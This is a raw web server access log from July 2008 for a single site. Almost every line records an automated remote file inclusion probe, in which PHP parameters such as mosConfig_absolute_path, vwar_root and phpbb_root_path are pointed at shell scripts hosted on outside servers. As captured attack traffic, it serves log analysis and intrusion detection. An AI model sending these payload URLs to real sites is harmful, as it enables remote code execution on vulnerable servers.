91.198.175.18 - - [06/Jul/2008:09:00:25 -0700] "GET /logs/access_080318.log/index.php?classified_path=http://www.vanderjagt-kraanverhuur.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.4.48.210 - - [06/Jul/2008:09:00:46 -0700] "GET /logs//?include_path=http://x-femdom.net/st/img/icons/test.txt?? HTTP/1.1" 200 54997 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
202.4.48.210 - - [06/Jul/2008:09:00:46 -0700] "GET //?include_path=http://x-femdom.net/st/img/icons/test.txt?? HTTP/1.1" 200 18417 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
61.9.60.141 - - [06/Jul/2008:09:00:58 -0700] "GET /logs/access_080318.log/index.php?classified_path=http://www.harvestresources.com/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.254.218.40 - - [06/Jul/2008:09:00:58 -0700] "GET /logs/access_080215.log/convert/mvcw.php?step=1&vwar_root=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.254.218.40 - - [06/Jul/2008:09:00:58 -0700] "GET /logs/access_080215.log/errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.254.218.40 - - [06/Jul/2008:09:00:59 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.254.218.40 - - [06/Jul/2008:09:00:59 -0700] "GET /errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.254.218.40 - - [06/Jul/2008:09:00:59 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.254.218.40 - - [06/Jul/2008:09:01:00 -0700] "GET /logs/errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
65.55.211.36 - - [06/Jul/2008:09:01:04 -0700] "GET /logs/access_080519.log HTTP/1.1" 304 - "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
213.134.125.46 - - [06/Jul/2008:09:01:10 -0700] "GET /logs/access_080114.log HTTP/1.1" 200 393216 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
89.111.176.28 - - [06/Jul/2008:09:01:20 -0700] "GET /index1.php?=http://www.xtracar.de/xc3/stylecss/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.150.164.61 - - [06/Jul/2008:09:01:20 -0700] "GET /logs/access_080313.log/index1.php?=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.150.164.61 - - [06/Jul/2008:09:01:21 -0700] "GET /index1.php?=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.150.164.61 - - [06/Jul/2008:09:01:21 -0700] "GET /logs/index1.php?=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.79.127.188 - - [06/Jul/2008:09:01:32 -0700] "GET /logs/access_080124.log HTTP/1.1" 200 458752 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
213.35.225.138 - - [06/Jul/2008:09:02:07 -0700] "GET /logs//components/errors.php?error=http://www.pravila-dobra.ru/mambots/readme1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.35.225.138 - - [06/Jul/2008:09:02:07 -0700] "GET //components/errors.php?error=http://www.pravila-dobra.ru/mambots/readme1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.206.255.17 - - [06/Jul/2008:09:02:17 -0700] "GET /logs/access_080130.log HTTP/1.0" 200 667419 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
83.19.39.162 - - [06/Jul/2008:09:02:51 -0700] "GET /logs/access_080207.log/index1.php?choix=http://queb3.info/cruise/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.19.39.162 - - [06/Jul/2008:09:02:51 -0700] "GET /index1.php?choix=http://queb3.info/cruise/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.19.39.162 - - [06/Jul/2008:09:02:52 -0700] "GET /logs/index1.php?choix=http://queb3.info/cruise/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.19.39.162 - - [06/Jul/2008:09:02:55 -0700] "GET /logs/access_080315.log/index1.php?menu=http://queb3.info/cruise/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.19.39.162 - - [06/Jul/2008:09:02:56 -0700] "GET /index1.php?menu=http://queb3.info/cruise/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.19.39.162 - - [06/Jul/2008:09:02:56 -0700] "GET /logs/access.log/index1.php?choix=http://queb3.info/cruise/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.19.39.162 - - [06/Jul/2008:09:02:56 -0700] "GET /logs/index1.php?menu=http://queb3.info/cruise/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.234.200.150 - - [06/Jul/2008:09:03:01 -0700] "GET /logs/access_080117.log//modules/vwar/admin/admin.php?vwar_root=http://tugaspeed.info/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.234.200.150 - - [06/Jul/2008:09:03:01 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://tugaspeed.info/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.234.200.150 - - [06/Jul/2008:09:03:02 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://tugaspeed.info/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.35.225.138 - - [06/Jul/2008:09:03:15 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.pravila-dobra.ru/mambots/readme1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.35.225.138 - - [06/Jul/2008:09:03:16 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.pravila-dobra.ru/mambots/readme1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.19.39.162 - - [06/Jul/2008:09:03:25 -0700] "GET /logs/access_080207.log/index1.php?menu=http://queb3.info/cruise/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.197.76 - - [06/Jul/2008:09:03:26 -0700] "GET /logs/access_080312.log/includes/db_connect.php?baseDir=http://sonstar.net/bbb/pro/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.197.76 - - [06/Jul/2008:09:03:26 -0700] "GET /includes/db_connect.php?baseDir=http://sonstar.net/bbb/pro/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.197.76 - - [06/Jul/2008:09:03:26 -0700] "GET /logs/includes/db_connect.php?baseDir=http://sonstar.net/bbb/pro/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.19.39.162 - - [06/Jul/2008:09:03:28 -0700] "GET /logs/index1.php?choix=http://queb3.info/cruise/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.19.39.162 - - [06/Jul/2008:09:03:28 -0700] "GET /index1.php?choix=http://queb3.info/cruise/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
60.241.203.30 - - [06/Jul/2008:09:03:30 -0700] "GET /logs/access_080218.log HTTP/1.1" 200 524288 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
89.111.176.28 - - [06/Jul/2008:09:03:34 -0700] "GET /logs/access_080117.log/index1.php?=http://www.xtracar.de/xc3/stylecss/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.254.218.40 - - [06/Jul/2008:09:04:01 -0700] "GET /logs/access.log/convert/mvcw.php?step=1&vwar_root=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.254.218.40 - - [06/Jul/2008:09:04:02 -0700] "GET /logs/access.log/errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
91.186.11.35 - - [06/Jul/2008:09:04:25 -0700] "GET /logs/access_080118.log//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.snatomania.altervista.org/saday%3C/text.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
91.186.11.35 - - [06/Jul/2008:09:04:25 -0700] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.snatomania.altervista.org/saday%3C/text.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
91.186.11.35 - - [06/Jul/2008:09:04:25 -0700] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.snatomania.altervista.org/saday%3C/text.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.234.200.150 - - [06/Jul/2008:09:04:29 -0700] "GET /logs/config.php?path_to_root=http://tugaspeed.info/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.234.200.150 - - [06/Jul/2008:09:04:29 -0700] "GET /config.php?path_to_root=http://tugaspeed.info/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.234.200.150 - - [06/Jul/2008:09:04:32 -0700] "GET /logs/config.php?path_to_root=http://tugaspeed.info/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.234.200.150 - - [06/Jul/2008:09:04:32 -0700] "GET /config.php?path_to_root=http://tugaspeed.info/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.49.13.112 - - [06/Jul/2008:09:04:38 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.49.13.112 - - [06/Jul/2008:09:04:42 -0700] "GET /logs//login.php?dir=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.49.13.112 - - [06/Jul/2008:09:04:43 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.49.13.112 - - [06/Jul/2008:09:04:47 -0700] "GET /logs//login.php?dir=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
200.234.200.150 - - [06/Jul/2008:09:04:50 -0700] "GET /logs/access_080211.log//modules/vwar/admin/admin.php?vwar_root=http://tugaspeed.info/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.49.13.112 - - [06/Jul/2008:09:04:52 -0700] "GET //login.php?dir=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.49.13.112 - - [06/Jul/2008:09:04:57 -0700] "GET //login.php?dir=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
78.24.133.93 - - [06/Jul/2008:09:05:02 -0700] "GET /port.php?content=http://www.creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.254.218.40 - - [06/Jul/2008:09:05:07 -0700] "GET /logs/access.log/index.php?opcao=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.254.218.40 - - [06/Jul/2008:09:05:08 -0700] "GET /logs/access.log/errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.254.218.40 - - [06/Jul/2008:09:05:10 -0700] "GET /index.php?opcao=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 200 18465 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.254.218.40 - - [06/Jul/2008:09:05:11 -0700] "GET /errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.254.218.40 - - [06/Jul/2008:09:05:11 -0700] "GET /logs/index.php?opcao=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.254.218.40 - - [06/Jul/2008:09:05:12 -0700] "GET /logs/errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
85.25.142.64 - - [06/Jul/2008:09:05:16 -0700] "GET /logs//errors.php?error=http://www.toxiii.com/includes/includes/x???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
85.25.142.64 - - [06/Jul/2008:09:05:17 -0700] "GET //errors.php?error=http://www.toxiii.com/includes/includes/x???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
78.24.133.93 - - [06/Jul/2008:09:05:26 -0700] "GET /logs/index2.php?url_page=http://www.creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.24.133.93 - - [06/Jul/2008:09:05:27 -0700] "GET /index2.php?url_page=http://www.creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.38.22.250 - - [06/Jul/2008:09:06:27 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://datteln-online.com/event/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.22.250 - - [06/Jul/2008:09:06:29 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://datteln-online.com/event/id.txt?? HTTP/1.1" 200 18523 "-" "libwww-perl/5.811" "www.dmulk.com"
74.53.178.146 - - [06/Jul/2008:09:06:36 -0700] "GET /logs/includes/db_connect.php?baseDir=http://sonstar.net/bbb/pro/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.178.146 - - [06/Jul/2008:09:06:36 -0700] "GET /includes/db_connect.php?baseDir=http://sonstar.net/bbb/pro/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
78.24.133.93 - - [06/Jul/2008:09:06:52 -0700] "GET /index1.php?x=http://www.creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.19.39.162 - - [06/Jul/2008:09:06:55 -0700] "GET /logs/index1.php?menu=http://queb3.info/cruise/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.19.39.162 - - [06/Jul/2008:09:06:56 -0700] "GET /index1.php?menu=http://queb3.info/cruise/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.193.130.151 - - [06/Jul/2008:09:07:14 -0700] "GET /logs/access_080207.log//components/errors.php?error=http://grupo.e-sportv.com/tst.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
91.193.130.151 - - [06/Jul/2008:09:07:14 -0700] "GET //components/errors.php?error=http://grupo.e-sportv.com/tst.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
89.188.110.128 - - [06/Jul/2008:09:07:17 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://lipno.org/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.188.110.128 - - [06/Jul/2008:09:07:20 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://lipno.org/sql.txt? HTTP/1.1" 200 18477 "-" "libwww-perl/5.805" "www.dmulk.com"
91.193.130.151 - - [06/Jul/2008:09:07:20 -0700] "GET /logs/access_080207.log//components/errors.php?error=http://grupo.e-sportv.com/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
91.193.130.151 - - [06/Jul/2008:09:07:21 -0700] "GET //components/errors.php?error=http://grupo.e-sportv.com/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
91.193.130.151 - - [06/Jul/2008:09:07:21 -0700] "GET /logs//components/errors.php?error=http://grupo.e-sportv.com/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.7.197.76 - - [06/Jul/2008:09:07:37 -0700] "GET /logs/access_080312.log/includes/db_connect.php?baseDir=http://sonstar.net/bbb/pro/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.197.76 - - [06/Jul/2008:09:07:37 -0700] "GET /logs/includes/db_connect.php?baseDir=http://sonstar.net/bbb/pro/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.181.105.117 - - [06/Jul/2008:09:07:57 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [06/Jul/2008:09:07:57 -0700] "GET /logs/access_080315.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [06/Jul/2008:09:07:57 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [06/Jul/2008:09:08:05 -0700] "GET /logs/access_080220.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
78.24.133.93 - - [06/Jul/2008:09:08:06 -0700] "GET /logs/access_080215.log/port.php?content=http://www.creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.24.133.93 - - [06/Jul/2008:09:08:07 -0700] "GET /logs/port.php?content=http://www.creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.16.26.124 - - [06/Jul/2008:09:08:10 -0700] "GET /logs/index.php?ort=http://servitis-web.com/ftdc/r0x.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
84.96.78.30 - - [06/Jul/2008:09:08:12 -0700] "GET /db.php?path_local=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
217.16.26.124 - - [06/Jul/2008:09:08:12 -0700] "GET /index.php?ort=http://servitis-web.com/ftdc/r0x.gif?? HTTP/1.1" 200 18397 "-" "libwww-perl/5.810" "www.dmulk.com"
84.96.78.30 - - [06/Jul/2008:09:08:13 -0700] "GET /errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
78.24.133.93 - - [06/Jul/2008:09:08:19 -0700] "GET /logs/access_080207.log/port.php?content=http://www.creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:09:08:36 -0700] "GET /logs/access_080207.log/:/components/errors.php?error=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:09:08:36 -0700] "GET /:/components/errors.php?error=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:09:08:36 -0700] "GET /logs/:/components/errors.php?error=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:09:08:51 -0700] "GET /logs/access_080207.log//components/errors.php?error=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:09:08:51 -0700] "GET //components/errors.php?error=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:09:08:51 -0700] "GET /logs//components/errors.php?error=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.200.229.130 - - [06/Jul/2008:09:08:54 -0700] "GET /logs/access_071230.log//index.php?lang=en&page=http://www.harvestresources.com/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.200.229.130 - - [06/Jul/2008:09:08:55 -0700] "GET //index.php?lang=en&page=http://www.harvestresources.com/bajo.txt????? HTTP/1.1" 200 18431 "-" "libwww-perl/5.810" "www.dmulk.com"
209.200.229.130 - - [06/Jul/2008:09:08:55 -0700] "GET /logs//index.php?lang=en&page=http://www.harvestresources.com/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.150.164.61 - - [06/Jul/2008:09:08:57 -0700] "GET /logs/access_080117.log/index1.php?=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
78.24.133.93 - - [06/Jul/2008:09:09:00 -0700] "GET /index1.php?site=http://www.creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.193.237.1 - - [06/Jul/2008:09:09:02 -0700] "GET /logs/access_080207.log/:/components/errors.php?error=http://www.librosdesegundamano.com/libros/img/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.193.237.1 - - [06/Jul/2008:09:09:02 -0700] "GET /:/components/errors.php?error=http://www.librosdesegundamano.com/libros/img/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.193.237.1 - - [06/Jul/2008:09:09:03 -0700] "GET /logs/:/components/errors.php?error=http://www.librosdesegundamano.com/libros/img/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.53.178.146 - - [06/Jul/2008:09:09:10 -0700] "GET /logs/access_080312.log/includes/db_connect.php?baseDir=http://sonstar.net/bbb/pro/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.178.146 - - [06/Jul/2008:09:09:10 -0700] "GET /includes/db_connect.php?baseDir=http://sonstar.net/bbb/pro/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.178.146 - - [06/Jul/2008:09:09:10 -0700] "GET /logs/includes/db_connect.php?baseDir=http://sonstar.net/bbb/pro/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.193.130.151 - - [06/Jul/2008:09:09:17 -0700] "GET /logs/access_071219.log//components/errors.php?error=http://grupo.e-sportv.com/tst.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
91.193.237.1 - - [06/Jul/2008:09:09:18 -0700] "GET /logs/access_071222.log/:/components/errors.php?error=http://www.librosdesegundamano.com/libros/img/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
78.24.133.93 - - [06/Jul/2008:09:09:22 -0700] "GET /logs/access_080220.log/index1.php?x=http://www.creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.24.133.93 - - [06/Jul/2008:09:09:22 -0700] "GET /logs/index1.php?x=http://www.creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.24.133.93 - - [06/Jul/2008:09:09:25 -0700] "GET /logs/access_080313.log/index1.php?x=http://www.creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.49.13.112 - - [06/Jul/2008:09:09:27 -0700] "GET /logs/index2.php?x=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
91.193.130.151 - - [06/Jul/2008:09:09:30 -0700] "GET /logs/access_071219.log//components/errors.php?error=http://grupo.e-sportv.com/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
65.49.13.112 - - [06/Jul/2008:09:09:32 -0700] "GET /index2.php?x=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
91.193.130.151 - - [06/Jul/2008:09:09:47 -0700] "GET //components/errors.php?error=http://grupo.e-sportv.com/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
205.234.240.98 - - [06/Jul/2008:09:09:49 -0700] "GET ///components/com_flyspray/startdown.php?file=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:09:09:54 -0700] "GET /logs/access_080207.log/:/components/errors.php?error=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:09:09:54 -0700] "GET /:/components/errors.php?error=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:09:09:54 -0700] "GET /logs/:/components/errors.php?error=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:09:09:56 -0700] "GET /logs/access_080207.log//components/errors.php?error=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
